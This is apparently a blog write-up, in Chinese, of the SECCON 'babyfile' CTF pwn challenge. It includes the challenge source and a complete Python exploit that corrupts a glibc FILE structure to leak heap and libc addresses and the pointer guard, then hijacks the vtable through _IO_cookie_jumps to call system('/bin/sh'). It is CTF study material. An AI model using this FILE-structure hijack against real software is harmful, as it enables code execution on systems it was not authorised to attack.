[seccon pwn] babyfile 复现

终于找到WP，按着一点点学习IO_file结构

这个题目给了源码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>static int menu(void);
static int getnline(char *buf, int size);
static int getint(void);#define write_str(s) write(STDOUT_FILENO, s, sizeof(s)-1)int main(void){FILE *fp;alarm(60);write_str("Play with FILE structure\n");if(!(fp = fopen("/dev/null", "r"))){write_str("Open error");return -1;}fp->_wide_data = NULL;for(;;){switch(menu()){case 0:goto END;case 1:fflush(fp);break;case 2:{unsigned char ofs;write_str("offset: ");if((ofs = getint()) & 0x80)ofs |= 0x40;write_str("value: ");((char*)fp)[ofs] = getint();}break;}write_str("Done.\n");}END:write_str("Bye!");_exit(0);
}static int menu(void){write_str("\nMENU\n""1. Flush\n""2. Trick\n""0. Exit\n""> ");return getint();
}static int getnline(char *buf, int size){int len;if(size <= 0 || (len = read(STDIN_FILENO, buf, size-1)) <= 0)return -1;if(buf[len-1]=='\n')len--;buf[len] = '\0';return len;
}static int getint(void){char buf[0x10] = {};getnline(buf, sizeof(buf));return atoi(buf);
}

他先生成了一个IO_file结构在堆里，然后允许修改，但其它地址都没有给出（包含堆地址，只允许按结构的偏移改）。

看了WP学了好多东西

1，先修改IO_jump_t->vtable 这里指向的vtable 给他+8然后作一次flush，他会把堆地址放入到IO结构里，然后再改恢复原状。

#!/usr/bin/env python3
# Date: 2022-10-24 16:33:10
# Link: https://github.com/RoderickChan/pwncli
# Usage:
#     Debug : py babyfile.py debug ./babyfile -b malloc
#     Remote: py babyfile.py remote ./babyfile ip:port# debug in Ubuntu 22.04
from pwncli import *
cli_script()io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libcCurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)def flush():sla('> ', '1')def edit(offset, val):sla('> ', '2')sla("offset: ", str(offset))sla("value: ", str(val))def change(offset, val):val = p64(val)for i,v in enumerate(val):edit(offset+i, v)def ROL(v,k):return ((v<<k)|(v>>(64-k)))&((1<<64)-1)#edit vtable A0->A8
#_IO_buf_base,_IO_buf_end == heap_addr
edit(0xd8, 0xa8)
flush()
'''
gef➤  x/40gx 0x000055bc216812a0
0x55bc216812a0: 0x00000000fbad2488      0x0000000000000000
0x55bc216812b0: 0x0000000000000000      0x0000000000000000
0x55bc216812c0: 0x0000000000000000      0x0000000000000000
0x55bc216812d0: 0x0000000000000000      0x0000000000000000
0x55bc216812e0: 0x0000000000000000      0x0000000000000000
0x55bc216812f0: 0x0000000000000000      0x0000000000000000
0x55bc21681300: 0x0000000000000000      0x00007f01477bb5c0
0x55bc21681310: 0x0000000000000003      0x0000000000000000
0x55bc21681320: 0x0000000000000000      0x000055bc21681380
0x55bc21681330: 0xffffffffffffffff      0x0000000000000000
0x55bc21681340: 0x0000000000000000      0x0000000000000000
0x55bc21681350: 0x0000000000000000      0x0000000000000000
0x55bc21681360: 0x0000000000000000      0x0000000000000000
0x55bc21681370: 0x0000000000000000      0x00007f01477b74a0  <- a80x562cde9a02a0: 0x00000000fbad2488      0x0000000000000000
0x562cde9a02b0: 0x0000000000000000      0x0000000000000000
0x562cde9a02c0: 0x0000000000000000      0x0000000000000000
0x562cde9a02d0: 0x0000000000000000      0x0000562cde9a0480  <- heap addr
0x562cde9a02e0: 0x0000562cde9a2480      0x0000000000000000
0x562cde9a02f0: 0x0000000000000000      0x0000000000000000
0x562cde9a0300: 0x0000000000000000      0x00007ff70f6765c0
0x562cde9a0310: 0x0000000000000003      0x0000000000000000
0x562cde9a0320: 0x0000000000000000      0x0000562cde9a0380
0x562cde9a0330: 0xffffffffffffffff      0x0000000000000000
0x562cde9a0340: 0x0000000000000000      0x0000000000000000
0x562cde9a0350: 0x0000000000000000      0x0000000000000000
0x562cde9a0360: 0x0000000000000000      0x0000000000000000
0x562cde9a0370: 0x0000000000000000      0x00007ff70f6724a8gef➤  heap chunks
Chunk(addr=0x562cde9a0010, size=0x290, flags=PREV_INUSE)[0x0000562cde9a0010     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0x562cde9a02a0, size=0x1e0, flags=PREV_INUSE)[0x0000562cde9a02a0     88 24 ad fb 00 00 00 00 00 00 00 00 00 00 00 00    .$..............]
Chunk(addr=0x562cde9a0480, size=0x2010, flags=PREV_INUSE)[0x0000562cde9a0480     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0x562cde9a2490, size=0x1eb80, flags=PREV_INUSE)  ←  top chunk
'''edit(0xd8, 0xa0) #change back
edit(8*5, 0x40) #_IO_write_base!=_IO_write_ptr
flush()

2，这时候IO_file里就有了好多堆地址指针，第二步就是泄露这个地址。

先在+14*8处写入文件id，这里要泄露所以写1到标准输出

然后是+4*8,+5*8处的write_base,write_ptr输入的起止地址

最后修改+2*8处的IO_read_end让他与write_base相同

这里泄露的是IO_wfile_jumps地址，根据偏移就能得到libc

edit(8*14, 1) #fileno
edit(8*5, 0x78) #write_ptr
edit(8*4, 0x70) #write_base
edit(8*2, 0x70) #_IO_read_end = write_base
'''
gef➤  x/40gx 0x556def01c2a0
0x556def01c2a0: 0x00000000fbad24a8      0x0000556def01c480
0x556def01c2b0: 0x0000556def01c470      0x0000556def01c480 #2 _IO_read_end
0x556def01c2c0: 0x0000556def01c470      0x0000556def01c478 #4 write_base #5 write_ptr
0x556def01c2d0: 0x0000556def01e480      0x0000556def01c480
0x556def01c2e0: 0x0000556def01e480      0x0000000000000000
0x556def01c2f0: 0x0000000000000000      0x0000000000000000
0x556def01c300: 0x0000000000000000      0x00007f42c711f5c0
0x556def01c310: 0x0000000000000001      0x0000000000000000  #14 fileno
0x556def01c320: 0x0000000000000000      0x0000556def01c380
0x556def01c330: 0xffffffffffffffff      0x0000000000000000
0x556def01c340: 0x0000000000000000      0x0000000000000000
0x556def01c350: 0x0000000000000000      0x0000000000000000
0x556def01c360: 0x0000000000000000      0x0000000000000000
0x556def01c370: 0x0000000000000000      0x00007f42c711b4a0
'''
flush()
lb = recv_current_libc_addr(0x1e8f60)  #0x7fe2b0dd1f60 <_IO_wfile_jumps>
set_current_libc_base_and_log(lb)

3，得到__pointer_chk_guard，由于这里写的值是由__pointer_chk_guard保护的，所以要先得到这个值。这个值与canary在canary值后边，可以在内存里找到。

它的加密方式是与原值异或或循环左移17位。

泄露的方法与前面相同，就是修改+4*8处的write_base,和+5*8处的write_ptr还有+2*8处的IO_read_end

#get __pointer_chk_guard
#0x7f9762bc55e8: 0xd02162c95479db00 (canary)  0x65643a3a6269cd1b (__pointer_chk_guard)
chk_guard_addr = lb + 0x1f35f0 #remote 0x1f35f0
change(8*5, chk_guard_addr +8) #write_ptr
change(8*4, chk_guard_addr) #write_base
change(8*2, chk_guard_addr) #_IO_read_end = write_baseflush()
chk_guard_val = u64(rn(8))
log_ex(hex(chk_guard_val))

4,最后改IO_jump_t->vtable指向IO_cookie_jumps+0x18然后在+e0,+f0处分别写bin/sh+0x100000000(这里为什么高位整形要加1，师傅也没说，反正以后也只能画瓢，不用多管)和与_pointer_chk_guard加密过的system

system_val = ROL(chk_guard_val^libc.sym.system , 17)
_IO_cookie_jumps = lb + 0x1e8a20
bin_sh = next(libc.search(b'/bin/sh'))
change(0xf0, system_val)
change(0xd8, _IO_cookie_jumps + 0x18)
change(0xe0, bin_sh - 0x100000000) #
flush()ia()

[seccon pwn] babyfile 复现相关推荐

2020第十一届极客大挑战——Geek Challenge部分wp
好吧好吧,这几天的比赛太多了,这个比赛题上的有点慢,只在打其他比赛的间隙打了两天的极客大挑战,现在回来填下坑吧. 就从最简单的MISC开始好了,简答题就简单写了. MISC1-一"页&quo ...
Linux pwn入门教程,i春秋linux_pwn入门教程复现之栈溢出基础
i春秋linux_pwn入门教程复现之栈溢出基础演示进程总览 1: main函数 2: hello函数 3: getShell函数函数的入栈和出栈 1: F2断点于call hello 启动IDA ...
【pwn】2020GEEKPWN复现
参考师傅的博客,复现一手2020GEEKPWN. 1.babypwn 思路: 1)fb 泄漏 heap_base,通过堆溢出修改 size,释放进 ub,泄漏 libc 2)然 ...
2021-NCTF pwn方向题目复现
周末在学校摸鱼了所以没有参加比赛,赛后看题又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1.easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf ...
ISCC部分pwn题解
前言菜的扣脚的pwn手,整了四个题,实在是菜,感觉在学校没法把心静下来写blog...寒假完美完成了假期前的flag.但是到现在开学立的flag一个都没完成....... 先把exp和分析过程贴上, ...
Metasploit上使用RPC方式复现一个Linux提权漏洞
序学习了几天pwn的栈溢出知识后,收到了期待已久的任务--在metasploit上使用RPC的方式复现一个Linux提权漏洞,学长说这是一个偏向探索性质的,为了督促自己和提高效率,利用这种方式记录下 ...
[安氵旬杯2022] 一些题目复现
w早上十点多起床开始做然后忘记提交大数据实验了(乐) 主要做了Re 有时间也会复现一下其他方向的 Re reeeee 绕过反调试去除花指令然后看到一个很像Rc4的算法但是感觉有点复杂怀疑是 ...
awd的批量脚本 pwn_北极星杯 awd复现
北极星杯 awd复现服务器共有3个web和一个pwn web1 1,down下web1的源码,使用D盾扫描: 2,漏洞1:发现三个冰蝎的木马,和一个一句话木马冰蝎的后门需要使用冰蝎的客户端进行连接 ...
pwn题堆利用的一些姿势 -- IO_FILE
IO_FILE 概述 IO_FILE结构介绍利用_fileno字段原理分析一个例子利用IO_FILE进行leak 原理分析一个例子 FSOP 原理分析一个例子总结 pwn题堆利用的一些姿 ...

[seccon pwn] babyfile 复现

[seccon pwn] babyfile 复现相关推荐

最新文章

热门文章